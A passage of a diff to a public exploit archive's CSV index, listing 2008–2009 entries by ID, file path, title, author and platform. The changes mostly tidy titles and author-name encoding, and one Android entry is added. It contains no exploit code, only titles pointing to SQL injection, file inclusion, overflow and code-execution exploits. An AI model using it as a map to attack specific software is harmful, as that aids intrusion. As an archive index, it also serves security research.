(randomized ports) Remote DNS Cache Poisoning Exploit",2008-08-13,Zbr,multiple,remote,0 6237,platforms/multiple/dos/6237.txt,"Ventrilo <= 3.0.2 NULL pointer Remote DoS Exploit",2008-08-13,"Luigi Auriemma",multiple,dos,0 6238,platforms/windows/remote/6238.c,"IntelliTamper 2.07/2.08 Beta 4 A HREF Remote Buffer Overflow Exploit",2008-08-13,kralor,windows,remote,0 -6239,platforms/multiple/dos/6239.txt,"Ruby <= 1.9 (regex engine) Remote Socket Memory Leak Exploit",2008-08-13,"laurent gaffié ",multiple,dos,0 +6239,platforms/multiple/dos/6239.txt,"Ruby <= 1.9 (regex engine) Remote Socket Memory Leak Exploit",2008-08-13,"laurent gaffié ",multiple,dos,0 6240,platforms/windows/dos/6240.py,"FlashGet 1.9 - (FTP PWD Response) Remote BoF Exploit PoC (0day)",2008-08-13,h07,windows,dos,0 6244,platforms/windows/dos/6244.js,"Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BoF PoC",2008-08-14,Symantec,windows,dos,0 6247,platforms/php/webapps/6247.txt,"dotCMS 1.6 (id) Multiple Local File Inclusion Vulnerabilities",2008-08-15,Don,php,webapps,0 @@ -5901,7 +5900,7 @@ id,file,description,date,author,platform,type,port 6313,platforms/php/webapps/6313.txt,"CMME 1.12 - (LFI/XSS/CSRF/Backup/MkDir) Multiple Vulnerabilities",2008-08-26,SirGod,php,webapps,0 6314,platforms/php/webapps/6314.txt,"Thickbox Gallery 2.0 - (admins.php) Admin Data Disclosure Vulnerability",2008-08-26,SirGod,php,webapps,0 6315,platforms/php/webapps/6315.txt,"iFdate <= 2.0.3 - Remote SQL Injection Vulnerability",2008-08-26,~!Dok_tOR!~,php,webapps,0 -6316,platforms/php/webapps/6316.php,"MyBulletinBoard (MyBB) <= 1.2.11 private.php SQL Injection Exploit (2)",2008-08-26,c411k,php,webapps,0 +6316,platforms/php/webapps/6316.php,"MyBulletinBoard (MyBB) <= 1.2.11 - private.php SQL Injection Exploit (2)",2008-08-26,c411k,php,webapps,0 6317,platforms/windows/remote/6317.html,"Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BoF Exploit",2008-08-26,Koshi,windows,remote,0 6318,platforms/windows/remote/6318.html,"Ultra Office ActiveX Control Remote Buffer Overflow Exploit",2008-08-27,shinnai,windows,remote,0 6319,platforms/windows/dos/6319.html,"Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit",2008-08-27,shinnai,windows,dos,0 @@ -6158,7 +6157,7 @@ id,file,description,date,author,platform,type,port 6585,platforms/php/webapps/6585.txt,"openengine 2.0 beta2 - Remote File Inclusion Vulnerability",2008-09-26,Crackers_Child,php,webapps,0 6586,platforms/php/webapps/6586.txt,"Crux Gallery <= 1.32 Insecure Cookie Handling Vulnerability",2008-09-26,Pepelux,php,webapps,0 6587,platforms/php/webapps/6587.txt,"The Gemini Portal (lang) Remote File Inclusion Vulnerabilities",2008-09-26,ZoRLu,php,webapps,0 -6588,platforms/windows/dos/6588.txt,"Microsoft Windows GDI+ - (.ico) Remote Division By Zero Exploit",2008-09-26,"laurent gaffié ",windows,dos,0 +6588,platforms/windows/dos/6588.txt,"Microsoft Windows GDI+ - (.ico) Remote Division By Zero Exploit",2008-09-26,"laurent gaffié ",windows,dos,0 6589,platforms/php/webapps/6589.txt,"RPG.Board <= 0.0.8Beta2 (showtopic) SQL Injection Vulnerability",2008-09-26,0x90,php,webapps,0 6590,platforms/php/webapps/6590.txt,"ASPapp KnowledgeBase (catid) Remote SQL Injection Vulnerability",2008-09-27,Crackers_Child,php,webapps,0 6591,platforms/php/webapps/6591.txt,"RPG.Board <= 0.0.8Beta2 Insecure Cookie Handling Vulnerability",2008-09-27,Stack,php,webapps,0 @@ -6332,7 +6331,7 @@ id,file,description,date,author,platform,type,port 6764,platforms/php/webapps/6764.php,"Mic_blog 0.0.3 (SQL Injection/Privilege Escalation) Remote Exploit",2008-10-16,StAkeR,php,webapps,0 6765,platforms/php/webapps/6765.txt,"IP Reg <= 0.4 - Multiple Remote SQL Injection Vulnerabilities",2008-10-16,JosS,php,webapps,0 6766,platforms/php/webapps/6766.txt,"PokerMax Poker League Insecure Cookie Handling Vulnerability",2008-10-16,DaRkLiFe,php,webapps,0 -6767,platforms/php/webapps/6767.txt,"Kure 0.6.3 - (index.php post,doc) Local File Inclusion Vulnerability",2008-10-16,JosS,php,webapps,0 +6767,platforms/php/webapps/6767.txt,"Kure 0.6.3 - (index.php post & doc) Local File Inclusion Vulnerability",2008-10-16,JosS,php,webapps,0 6768,platforms/php/webapps/6768.txt,"Mantis Bug Tracker <= 1.1.3 - Remote Code Execution Exploit",2008-10-16,EgiX,php,webapps,0 6769,platforms/php/webapps/6769.pl,"iGaming CMS 2.0 Alpha 1 (search.php) Remote SQL Injection Exploit",2008-10-16,StAkeR,php,webapps,0 6770,platforms/php/webapps/6770.txt,"PHP Easy Downloader 1.5 (file) File Disclosure Vulnerability",2008-10-16,LMaster,php,webapps,0 @@ -6360,8 +6359,8 @@ id,file,description,date,author,platform,type,port 6792,platforms/php/webapps/6792.txt,"Joomla Component ds-syndicate (feed_id) SQL Injection Vulnerability",2008-10-20,boom3rang,php,webapps,0 6793,platforms/windows/remote/6793.html,"Dart Communications PowerTCP FTP module Remote BoF Exploit",2008-10-20,InTeL,windows,remote,0 6795,platforms/php/webapps/6795.txt,"XOOPS Module makale Remote SQL Injection Vulnerability",2008-10-20,EcHoLL,php,webapps,0 -6796,platforms/php/webapps/6796.txt,"Limbo CMS (Private Messaging Component) SQL Injection Vulnerability",2008-10-21,StAkeR,php,webapps,0 -6797,platforms/php/webapps/6797.txt,"LightBlog 9.8 - (GET,POST,COOKIE) Multiple LFI Vulnerabilities",2008-10-21,JosS,php,webapps,0 +6796,platforms/php/webapps/6796.txt,"Limbo CMS - (Private Messaging Component) SQL Injection Vulnerability",2008-10-21,StAkeR,php,webapps,0 +6797,platforms/php/webapps/6797.txt,"LightBlog 9.8 - (GET & POST & COOKIE) Multiple LFI Vulnerabilities",2008-10-21,JosS,php,webapps,0 6798,platforms/windows/local/6798.pl,"VLC Media Player TY File Stack Based Buffer Overflow Exploit",2008-10-21,"Guido Landi",windows,local,0 6799,platforms/php/webapps/6799.txt,"ShopMaker 1.0 (product.php id) Remote SQL Injection Vulnerability",2008-10-21,"Hussin X",php,webapps,0 6800,platforms/windows/dos/6800.pl,"freeSSHd 1.2.1 sftp rename Remote Buffer Overflow PoC (auth)",2008-10-22,"Jeremy Brown",windows,dos,0 @@ -6521,7 +6520,7 @@ id,file,description,date,author,platform,type,port 6956,platforms/php/webapps/6956.txt,"apartment search script (rfu/XSS) Multiple Vulnerabilities",2008-11-02,ZoRLu,php,webapps,0 6957,platforms/php/webapps/6957.txt,"NetRisk <= 2.0 (XSS/SQL Injection) Remote Vulnerabilities",2008-11-02,StAkeR,php,webapps,0 6958,platforms/php/webapps/6958.txt,"Maran PHP Shop (prodshow.php) SQL Injection Vulnerability",2008-11-02,d3v1l,php,webapps,0 -6960,platforms/php/webapps/6960.txt,"1st News (products.php id) Remote SQL Injection Vulnerability",2008-11-02,TR-ShaRk,php,webapps,0 +6960,platforms/php/webapps/6960.txt,"1st News - (products.php id) Remote SQL Injection Vulnerability",2008-11-02,TR-ShaRk,php,webapps,0 6961,platforms/php/webapps/6961.pl,"deV!Lz Clanportal [DZCP] <= 1.4.9.6 - Blind SQL Injection Exploit",2008-11-02,N/A,php,webapps,0 6962,platforms/php/webapps/6962.txt,"BosDev BosClassifieds (cat_id) SQL Injection Vulnerability",2008-11-03,ZoRLu,php,webapps,0 6963,platforms/windows/remote/6963.html,"Chilkat Crypt - ActiveX Arbitrary File Creation/Execution PoC",2008-11-03,shinnai,windows,remote,0 @@ -6711,7 +6710,7 @@ id,file,description,date,author,platform,type,port 7156,platforms/php/webapps/7156.txt,"E-topbiz Link Back Checker 1 Insecure Cookie Handling Vulnerability",2008-11-18,x0r,php,webapps,0 7157,platforms/php/webapps/7157.txt,"Alex News-Engine 1.5.1 - Remote Arbitrary File Upload Vulnerability",2008-11-19,Batter,php,webapps,0 7158,platforms/php/webapps/7158.txt,"Alex Article-Engine 1.3.0 (fckeditor) Arbitrary File Upload Vulnerability",2008-11-19,Batter,php,webapps,0 -7159,platforms/php/webapps/7159.php,"PunBB (Private Messaging System 1.2.x) Multiple LFI Exploit",2008-11-19,StAkeR,php,webapps,0 +7159,platforms/php/webapps/7159.php,"PunBB (Private Messaging System 1.2.x) - Multiple LFI Exploit",2008-11-19,StAkeR,php,webapps,0 7160,platforms/php/webapps/7160.php,"MyTopix <= 1.3.0 (notes send) Remote SQL Injection Exploit",2008-11-19,cOndemned,php,webapps,0 7162,platforms/php/webapps/7162.pl,"MauryCMS <= 0.53.2 - Remote Shell Upload Exploit",2008-11-19,StAkeR,php,webapps,0 7163,platforms/php/webapps/7163.txt,"RevSense (Auth bypass) Remote SQL Injection Vulnerability",2008-11-19,d3b4g,php,webapps,0 @@ -6766,11 +6765,11 @@ id,file,description,date,author,platform,type,port 7218,platforms/php/webapps/7218.txt,"nitrotech 0.0.3a (rfi/SQL) Multiple Vulnerabilities",2008-11-24,Osirys,php,webapps,0 7219,platforms/windows/dos/7219.pl,"Total Video Player (vcen.dll) Remote off by one Crash Exploit",2008-11-24,Cnaph,windows,dos,0 7220,platforms/hardware/dos/7220.txt,"Siemens C450IP/C475IP Remote Denial of Service Vulnerability",2008-11-24,"sky & Any",hardware,dos,0 -7221,platforms/php/webapps/7221.txt,"Pie Web M{a,e}sher 0.5.3 - Multiple Remote File Inclusion Vulnerability",2008-11-24,NoGe,php,webapps,0 +7221,platforms/php/webapps/7221.txt,"Pie Web M{a_e}sher 0.5.3 - Multiple Remote File Inclusion Vulnerability",2008-11-24,NoGe,php,webapps,0 7222,platforms/php/webapps/7222.txt,"WebStudio eHotel (pageid) Blind SQL Injection Vulnerability",2008-11-25,"Hussin X",php,webapps,0 7223,platforms/php/webapps/7223.txt,"WebStudio eCatalogue (pageid) Blind SQL Injection Vulnerability",2008-11-25,"Hussin X",php,webapps,0 7224,platforms/php/webapps/7224.txt,"FAQ Manager 1.2 (categorie.php cat_id) SQL Injection Vulnerability",2008-11-25,cOndemned,php,webapps,0 -7225,platforms/php/webapps/7225.txt,"pie Web m{a,e}sher mod rss 0.1 - Remote File Inclusion Vulnerability",2008-11-25,ZoRLu,php,webapps,0 +7225,platforms/php/webapps/7225.txt,"pie Web m{a_e}sher mod rss 0.1 - Remote File Inclusion Vulnerability",2008-11-25,ZoRLu,php,webapps,0 7226,platforms/windows/dos/7226.html,"Google Chrome Browser MetaCharacter URI Obfuscation Vulnerability",2008-11-25,"Aditya K Sood",windows,dos,0 7227,platforms/php/webapps/7227.txt,"chipmunk topsites (auth bypass/XSS) Multiple Vulnerabilities",2008-11-25,ZoRLu,php,webapps,0 7228,platforms/php/webapps/7228.txt,"clean CMS 1.5 (blind SQL Injection/XSS) Multiple Vulnerabilities",2008-11-25,ZoRLu,php,webapps,0 @@ -6840,7 +6839,7 @@ id,file,description,date,author,platform,type,port 7293,platforms/asp/webapps/7293.txt,"Active Web Helpdesk 2 - (Auth Bypass) SQL Injection Vulnerability",2008-11-29,Cyber-Zone,asp,webapps,0 7294,platforms/php/webapps/7294.pl,"Lito Lite CMS (cate.php cid) Remote SQL Injection Exploit",2008-11-29,"CWH Underground",php,webapps,0 7295,platforms/asp/webapps/7295.txt,"Active Test 2.1 (QuizID) Blind SQL Injection Vulnerability",2008-11-29,R3d-D3V!L,asp,webapps,0 -7296,platforms/windows/dos/7296.txt,"Itunes 8.0.2.20/Quicktime 7.5.5 - (.mov) Multiple Off By Overflow PoC",2008-11-30,"laurent gaffié ",windows,dos,0 +7296,platforms/windows/dos/7296.txt,"Itunes 8.0.2.20/Quicktime 7.5.5 - (.mov) Multiple Off By Overflow PoC",2008-11-30,"laurent gaffié ",windows,dos,0 7297,platforms/windows/dos/7297.py,"Cain & Abel 4.9.23 (rdp file) Buffer Overflow PoC",2008-11-30,"Encrypt3d.M!nd ",windows,dos,0 7298,platforms/php/webapps/7298.txt,"Active Web Helpdesk 2 - (CategoryID) Blind SQL Injection Vulnerability",2008-11-30,Cyber-Zone,php,webapps,0 7299,platforms/php/webapps/7299.txt,"Active Photo Gallery 6.2 (Auth Bypass) SQL Injection Vulnerability",2008-11-30,R3d-D3V!L,php,webapps,0 @@ -7020,7 +7019,7 @@ id,file,description,date,author,platform,type,port 7476,platforms/php/webapps/7476.txt,"Mediatheka <= 4.2 - Remote Blind SQL Injection Exploit",2008-12-15,StAkeR,php,webapps,0 7477,platforms/windows/remote/7477.html,"Microsoft Internet Explorer XML Parsing Buffer Overflow Exploit (allinone)",2008-12-15,krafty,windows,remote,0 7478,platforms/php/webapps/7478.txt,"The Rat CMS Alpha 2 (Auth Bypass) SQL Injection Vulnerability",2008-12-15,x0r,php,webapps,0 -7479,platforms/php/webapps/7479.txt,"XOOPS Module Amevents (print.php id) SQL Injection Vulnerability",2008-12-15,nétRoot,php,webapps,0 +7479,platforms/php/webapps/7479.txt,"XOOPS Module Amevents (print.php id) SQL Injection Vulnerability",2008-12-15,nétRoot,php,webapps,0 7480,platforms/php/webapps/7480.txt,"CadeNix (cid) Remote SQL Injection Vulnerability",2008-12-15,HaCkeR_EgY,php,webapps,0 7481,platforms/php/webapps/7481.txt,"WorkSimple 1.2.1 RFI / Sensitive Data Disclosure Vulnerabilities",2008-12-15,Osirys,php,webapps,0 7482,platforms/php/webapps/7482.txt,"Aperto Blog 0.1.1 - Local File Inclusion / SQL Injection Vulnerabilities",2008-12-15,NoGe,php,webapps,0 @@ -7037,7 +7036,7 @@ id,file,description,date,author,platform,type,port 7493,platforms/php/webapps/7493.txt,"Liberum Help Desk 0.97.3 (SQL/DD) Remote Vulnerabilities",2008-12-16,"Cold Zero",php,webapps,0 7494,platforms/php/webapps/7494.txt,"Zelta E Store (RFU/BYPASS/R-SQL/B-SQL) Multiple Vulnerabilities",2008-12-16,ZoRLu,php,webapps,0 7495,platforms/asp/webapps/7495.txt,"Gnews Publisher .NET (authors.asp authorID) SQL Injection Vulnerability",2008-12-16,AlpHaNiX,asp,webapps,0 -7496,platforms/hardware/remote/7496.txt,"Barracuda Spam Firewall 3.5.11.020, Model 600 - SQL Injection Vuln",2008-12-16,"Marian Ventuneac",hardware,remote,0 +7496,platforms/hardware/remote/7496.txt,"Barracuda Spam Firewall 3.5.11.020 Model 600 - SQL Injection Vuln",2008-12-16,"Marian Ventuneac",hardware,remote,0 7497,platforms/php/webapps/7497.txt,"RSMScript 1.21 - XSS/Insecure Cookie Handling Vulnerabilities",2008-12-17,Osirys,php,webapps,0 7499,platforms/asp/webapps/7499.txt,"BP Blog 6.0/7.0/8.0/9.0 - Remote Database Disclosure Vulnerability",2008-12-17,Dxil,asp,webapps,0 7500,platforms/php/webapps/7500.txt,"K&S Shopsysteme Arbitrary Remote File Upload Vulnerability",2008-12-17,mNt,php,webapps,0 @@ -7125,7 +7124,7 @@ id,file,description,date,author,platform,type,port 7582,platforms/windows/local/7582.py,"IntelliTamper 2.07/2.08 (MAP File) Local SEH Overwrite Exploit",2008-12-28,Cnaph,windows,local,0 7583,platforms/windows/remote/7583.pl,"Microsoft Internet Explorer XML Parsing Buffer Overflow Exploit",2008-12-28,"Jeremy Brown",windows,remote,0 7584,platforms/windows/remote/7584.pl,"Amaya Web Browser <= 11.0.1 - Remote Buffer Overflow Exploit (vista)",2008-12-28,SkD,windows,remote,0 -7585,platforms/windows/dos/7585.txt,"Microsoft Windows Media Player - (.WAV) Remote Crash PoC",2008-12-28,"laurent gaffié ",windows,dos,0 +7585,platforms/windows/dos/7585.txt,"Microsoft Windows Media Player - (.WAV) Remote Crash PoC",2008-12-28,"laurent gaffié ",windows,dos,0 7586,platforms/php/webapps/7586.txt,"Miniweb 2.0 (Auth Bypass) SQL Injection Vulnerability",2008-12-28,bizzit,php,webapps,0 7587,platforms/php/webapps/7587.txt,"Joomla Component PAX Gallery 0.1 - Blind SQL Injection Vulnerability",2008-12-28,XaDoS,php,webapps,0 7589,platforms/windows/dos/7589.pl,"BulletProof FTP Client - (.bps ) Local Stack Overflow PoC",2008-12-28,Stack,windows,dos,0 @@ -7168,7 +7167,7 @@ id,file,description,date,author,platform,type,port 7628,platforms/php/webapps/7628.txt,"viart shopping cart 3.5 - Multiple Vulnerabilities",2009-01-01,"Xia Shing Zee",php,webapps,0 7629,platforms/php/webapps/7629.txt,"DDL-Speed Script (acp/backup) Admin Backup Bypass Vulnerability",2009-01-01,tmh,php,webapps,0 7630,platforms/windows/remote/7630.html,"Megacubo 5.0.7 (mega://) Remote File Download and Execute Exploit",2009-01-01,JJunior,windows,remote,0 -7631,platforms/php/webapps/7631.txt,"2Capsule (sticker.php id) Remote SQL Injection Vulnerability",2009-01-01,Zenith,php,webapps,0 +7631,platforms/php/webapps/7631.txt,"2Capsule - (sticker.php id) Remote SQL Injection Vulnerability",2009-01-01,Zenith,php,webapps,0 7632,platforms/hardware/dos/7632.txt,"Nokia S60 SMS/Mms (Curse of Silence) Denial of Service Vulnerability",2009-01-01,"Tobias Engel",hardware,dos,0 7633,platforms/php/webapps/7633.txt,"EggBlog 3.1.10 Change Admin Pass CSRF Vulnerability",2009-01-01,x0r,php,webapps,0 7634,platforms/windows/dos/7634.pl,"Audacity 1.2.6 - (.gro) Local Buffer Overflow PoC",2009-01-01,Houssamix,windows,dos,0 @@ -7184,7 +7183,7 @@ id,file,description,date,author,platform,type,port 7644,platforms/php/webapps/7644.txt,"Built2Go PHP Link Portal 1.95.1 - Remote File Upload Vulnerability",2009-01-02,ZoRLu,php,webapps,0 7645,platforms/php/webapps/7645.txt,"Built2Go PHP Rate My Photo 1.46.4 - Remote File Upload Vulnerability",2009-01-02,ZoRLu,php,webapps,0 7646,platforms/multiple/local/7646.txt,"PHP <= 5.2.8 gd library - imageRotate() Information Leak Vulnerability",2009-01-02,"Hamid Ebadi",multiple,local,0 -7647,platforms/multiple/dos/7647.txt,"VMware <= 2.5.1 (Vmware-authd) Remote Denial of Service Exploit",2009-01-02,"laurent gaffié ",multiple,dos,0 +7647,platforms/multiple/dos/7647.txt,"VMware <= 2.5.1 (Vmware-authd) Remote Denial of Service Exploit",2009-01-02,"laurent gaffié ",multiple,dos,0 7648,platforms/php/webapps/7648.txt,"phpskelsite 1.4 (rfi/lfi/XSS) Multiple Vulnerabilities",2009-01-02,ahmadbady,php,webapps,0 7649,platforms/windows/dos/7649.pl,"Destiny Media Player 1.61 - (.m3u) Local Buffer Overflow PoC",2009-01-02,"aBo MoHaMeD",windows,dos,0 7650,platforms/php/webapps/7650.php,"Lito Lite CMS - Multiple Cross-Site Scripting / Blind SQL Injection Exploit",2009-01-03,darkjoker,php,webapps,0 @@ -7480,6 +7479,7 @@ id,file,description,date,author,platform,type,port 7947,platforms/php/webapps/7947.pl,"eVision CMS 2.0 - Remote Code Execution Exploit",2009-02-02,Osirys,php,webapps,0 7948,platforms/php/webapps/7948.php,"phpslash <= 0.8.1.1 - Remote Code Execution Exploit",2009-02-02,DarkFig,php,webapps,0 7949,platforms/php/webapps/7949.rb,"OpenHelpDesk 1.0.100 eval() Code Execution Exploit (meta)",2009-02-02,LSO,php,webapps,0 +18164,platforms/android/webapps/18164.php,"Android 'content://' URI - Multiple Information Disclosure Vulnerabilities",2011-11-28,"Thomas Cannon",android,webapps,0 7951,platforms/php/webapps/7951.txt,"WholeHogSoftware Ware Support Insecure Cookie Handling Vulnerability",2009-02-03,Stack,php,webapps,0 7952,platforms/php/webapps/7952.txt,"WholeHogSoftware Password Protect Insecure Cookie Handling Vuln",2009-02-03,Stack,php,webapps,0 7953,platforms/php/webapps/7953.txt,"ClickCart 6.0 (Auth Bypass) Remote SQL Injection Vulnerability",2009-02-03,R3d-D3V!L,php,webapps,0 @@ -7589,7 +7589,7 @@ id,file,description,date,author,platform,type,port 8061,platforms/php/webapps/8061.pl,"simplePms CMS <= 0.1.4 - LFI / Remote Command Execution Exploit",2009-02-16,Osirys,php,webapps,0 8062,platforms/php/webapps/8062.txt,"powermovielist 0.14b (sql/XSS) Multiple Vulnerabilities",2009-02-16,brain[pillow],php,webapps,0 8063,platforms/php/webapps/8063.txt,"novaboard 1.0.0 - Multiple Vulnerabilities",2009-02-16,brain[pillow],php,webapps,0 -8064,platforms/php/webapps/8064.pl,"MemHT Portal <= 4.0.1 (pvtmsg) Delete All Private Messages Exploit",2009-02-16,StAkeR,php,webapps,0 +8064,platforms/php/webapps/8064.pl,"MemHT Portal <= 4.0.1 - (pvtmsg) Delete All Private Messages Exploit",2009-02-16,StAkeR,php,webapps,0 8065,platforms/asp/webapps/8065.txt,"SAS Hotel Management System (myhotel_info.asp) SQL Injection Vuln",2009-02-16,Darkb0x,asp,webapps,0 8066,platforms/php/webapps/8066.txt,"YACS CMS 8.11 update_trailer.php Remote File Inclusion Vulnerability",2009-02-16,ahmadbady,php,webapps,0 8067,platforms/multiple/local/8067.txt,"Enomaly ECP / Enomalism < 2.2.1 - Multiple Local Vulnerabilities",2009-02-16,"Sam Johnston",multiple,local,0 @@ -7655,7 +7655,7 @@ id,file,description,date,author,platform,type,port 8132,platforms/asp/webapps/8132.txt,"Access2asp imageLibrary Arbitrary ASP Shell Upload Vulnerability",2009-03-02,mr.al7rbi,asp,webapps,0 8133,platforms/php/webapps/8133.txt,"Graugon PHP Article Publisher 1.0 (SQL/CH) Multiple Remote Vulns",2009-03-02,x0r,php,webapps,0 8134,platforms/php/webapps/8134.php,"Joomla com_digistore (pid) Blind SQL Injection Exploit",2009-03-02,InjEctOr5,php,webapps,0 -8135,platforms/windows/dos/8135.pl,"Media Commands (M3U,M3l,TXT,LRC Files) Local Heap Overflow PoC",2009-03-02,Hakxer,windows,dos,0 +8135,platforms/windows/dos/8135.pl,"Media Commands - (M3U & M3l & TXT & LRC Files) Local Heap Overflow PoC",2009-03-02,Hakxer,windows,dos,0 8136,platforms/php/webapps/8136.txt,"Joomla/Mambo Component eXtplorer Code Execution Vulnerability",2009-03-02,"Juan Galiana Lara",php,webapps,0 8137,platforms/windows/local/8137.py,"Media Commands (m3u File) Local SEH Overwrite Exploit",2009-03-02,His0k4,windows,local,0 8138,platforms/windows/local/8138.c,"VUplayer 2.49 - (.cue) Local Buffer Overflow Exploit",2009-03-02,"Assed Edin",windows,local,0 @@ -8163,7 +8163,7 @@ id,file,description,date,author,platform,type,port 8657,platforms/windows/local/8657.txt,"EasyPHP 3.0 - Arbitrary Modify Configuration File Vulnerability",2009-05-11,Zigma,windows,local,0 8658,platforms/php/webapps/8658.txt,"php recommend <= 1.3 (ab/rfi/ci) Multiple Vulnerabilities",2009-05-11,scriptjunkie,php,webapps,0 8659,platforms/php/webapps/8659.php,"Bitweaver <= 2.6 saveFeed() Remote Code Execution Exploit",2009-05-12,Nine:Situations:Group,php,webapps,0 -8660,platforms/windows/local/8660.pl,"CastRipper 2.50.70 - (.m3u) Local Buffer Overflow Exploit",2009-05-12,[0]x80->[H]4x²0r,windows,local,0 +8660,platforms/windows/local/8660.pl,"CastRipper 2.50.70 - (.m3u) Local Buffer Overflow Exploit",2009-05-12,[0]x80->[H]4x²0r,windows,local,0 8661,platforms/windows/local/8661.pl,"CastRipper 2.50.70 - (.m3u) Universal Stack Overflow Exploit",2009-05-12,Stack,windows,local,0 8662,platforms/windows/local/8662.py,"CastRipper 2.50.70 - (.m3u) Universal Stack Overflow Exploit (py)",2009-05-12,"Super Cristal",windows,local,0 8663,platforms/windows/local/8663.pl,"CastRipper 2.50.70 - (.pls) Universal Stack Overflow Exploit",2009-05-12,zAx,windows,local,0 @@ -8274,7 +8274,7 @@ id,file,description,date,author,platform,type,port 8774,platforms/php/webapps/8774.htm,"Mole Group Sky Hunter/Bus Ticket Scripts Change Admin Pass Exploit",2009-05-22,G4N0K,php,webapps,0 8775,platforms/php/webapps/8775.txt,"Mole Group Restaurant Directory Script 3.0 Change Admin Pass Vuln",2009-05-22,G4N0K,php,webapps,0 8776,platforms/php/webapps/8776.txt,"photovideotube 1.11 - Multiple Vulnerabilities",2009-05-22,Hakxer,php,webapps,0 -8777,platforms/windows/dos/8777.txt,"Soulseek 157 NS x / 156.x - Remote Distributed Search Code Execution",2009-05-26,"laurent gaffié ",windows,dos,0 +8777,platforms/windows/dos/8777.txt,"Soulseek 157 NS x / 156.x - Remote Distributed Search Code Execution",2009-05-26,"laurent gaffié ",windows,dos,0 8778,platforms/php/webapps/8778.txt,"minitwitter 0.3-beta (sql/XSS) Multiple Vulnerabilities",2009-05-26,YEnH4ckEr,php,webapps,0 8779,platforms/php/webapps/8779.txt,"Joomla Boy Scout Advancement 0.3 (id) SQL Injection Exploit",2009-05-26,YEnH4ckEr,php,webapps,0 8780,platforms/windows/local/8780.php,"COWON America jetCast 2.0.4.1109 - (.mp3) Local Overflow Exploit",2009-05-26,Nine:Situations:Group,windows,local,0 @@ -8428,7 +8428,7 @@ id,file,description,date,author,platform,type,port 8934,platforms/windows/remote/8934.py,"Apple iTunes 8.1.1.10 - (itms/itcp) Remote Buffer Overflow Exploit (win)",2009-06-12,ryujin,windows,remote,0 8935,platforms/php/webapps/8935.txt,"Zip Store Chat 4.0/5.0 (Auth Bypass) SQL Injection Vulnerability",2009-06-12,ByALBAYX,php,webapps,0 8936,platforms/php/webapps/8936.txt,"4images <= 1.7.7 Filter Bypass HTML Injection/XSS Vulnerability",2009-06-12,Qabandi,php,webapps,0 -8937,platforms/php/webapps/8937.txt,"campus virtual-lms (xss/SQL Injection) Multiple Vulnerabilities",2009-06-12,Yasión,php,webapps,0 +8937,platforms/php/webapps/8937.txt,"campus virtual-lms (xss/SQL Injection) Multiple Vulnerabilities",2009-06-12,Yasión,php,webapps,0 8938,platforms/windows/remote/8938.txt,"Green Dam 3.17 (URL) Remote Buffer Overflow Exploit (xp/sp2)",2009-06-12,seer[N.N.U],windows,remote,0 8939,platforms/php/webapps/8939.pl,"phpWebThings <= 1.5.2 MD5 Hash Retrieve/File Disclosure Exploit",2009-06-12,StAkeR,php,webapps,0 8940,platforms/multiple/dos/8940.pl,"Asterisk IAX2 Resource Exhaustion via Attacked IAX Fuzzer",2009-06-12,"Blake Cornell",multiple,dos,0 @@ -8565,7 +8565,7 @@ id,file,description,date,author,platform,type,port 9081,platforms/php/webapps/9081.txt,"Rentventory Multiple Remote SQL Injection Vulnerabilities",2009-07-02,Moudi,php,webapps,0 9082,platforms/freebsd/local/9082.c,"FreeBSD 7.0/7.1 vfs.usermount Local Privilege Escalation Exploit",2009-07-09,"Patroklos Argyroudis",freebsd,local,0 9083,platforms/linux/local/9083.c,"Linux Kernel <= 2.6.28.3 - set_selection() UTF-8 Off By One Local Exploit",2009-07-09,sgrakkyu,linux,local,0 -9084,platforms/windows/dos/9084.txt,"Soulseek 157 NS < 13e/156.x - Remote Peer Search Code Execution PoC",2009-07-09,"laurent gaffié ",windows,dos,0 +9084,platforms/windows/dos/9084.txt,"Soulseek 157 NS < 13e/156.x - Remote Peer Search Code Execution PoC",2009-07-09,"laurent gaffié ",windows,dos,0 9085,platforms/multiple/dos/9085.txt,"MySQL <= 5.0.45 COM_CREATE_DB Format String PoC (auth)",2009-07-09,kingcope,multiple,dos,0 9086,platforms/php/webapps/9086.txt,"MRCGIGUY Thumbnail Gallery Post 1b Arb. Shell Upload Vulnerability",2009-07-09,"ThE g0bL!N",php,webapps,0 9087,platforms/php/webapps/9087.php,"Nwahy Dir 2.1 - Arbitrary Change Admin Password Exploit",2009-07-09,rEcruit,php,webapps,0 @@ -8603,7 +8603,7 @@ id,file,description,date,author,platform,type,port 9119,platforms/php/webapps/9119.txt,"LionWiki (index.php page) Local File Inclusion Vulnerability",2009-07-10,MoDaMeR,php,webapps,0 9121,platforms/php/webapps/9121.php,"Morcego CMS <= 1.7.6 - Remote Blind SQL Injection Exploit",2009-07-10,darkjoker,php,webapps,0 9122,platforms/php/webapps/9122.txt,"Opial 1.0 - Arbitrary File Upload/XSS/SQL Injection Vulnerabilities",2009-07-11,LMaster,php,webapps,0 -9123,platforms/windows/dos/9123.pl,"M3U/M3L to ASX/WPL 1.1 - (ASX,M3U,M3L) Local BoF PoC",2009-07-11,"ThE g0bL!N",windows,dos,0 +9123,platforms/windows/dos/9123.pl,"M3U/M3L to ASX/WPL 1.1 - (ASX & M3U & M3L) Local BoF PoC",2009-07-11,"ThE g0bL!N",windows,dos,0 9124,platforms/windows/dos/9124.pl,"Playlistmaker 1.5 - (.M3U/M3L/TXT) Local Stack Overflow PoC",2009-07-11,"ThE g0bL!N",windows,dos,0 9125,platforms/php/webapps/9125.txt,"Ebay Clone 2009 - Multiple SQL Injection Vulnerabilities",2009-07-11,MizoZ,php,webapps,0 9126,platforms/php/webapps/9126.txt,"Joomla Component com_category (catid) SQL Injection Vulnerability",2009-07-11,Prince_Pwn3r,php,webapps,0 @@ -8626,7 +8626,7 @@ id,file,description,date,author,platform,type,port 9143,platforms/linux/remote/9143.txt,"Virtualmin < 3.703 - Multiple Local/Remote Vulnerabilities",2009-07-14,"Filip Palian",linux,remote,0 9144,platforms/php/webapps/9144.txt,"Mobilelib Gold 3.0 - Local File Disclosure Vulnerability",2009-07-14,Qabandi,php,webapps,0 9145,platforms/php/webapps/9145.php,"Traidnt UP 2.0 - Remote Blind SQL Injection Exploit",2009-07-14,Qabandi,php,webapps,0 -9146,platforms/windows/local/9146.pl,"Icarus 2.0 - (.ICP) Local Stack Overflow Exploit",2009-07-14,[0]x80->[H]4x²0r,windows,local,0 +9146,platforms/windows/local/9146.pl,"Icarus 2.0 - (.ICP) Local Stack Overflow Exploit",2009-07-14,[0]x80->[H]4x²0r,windows,local,0 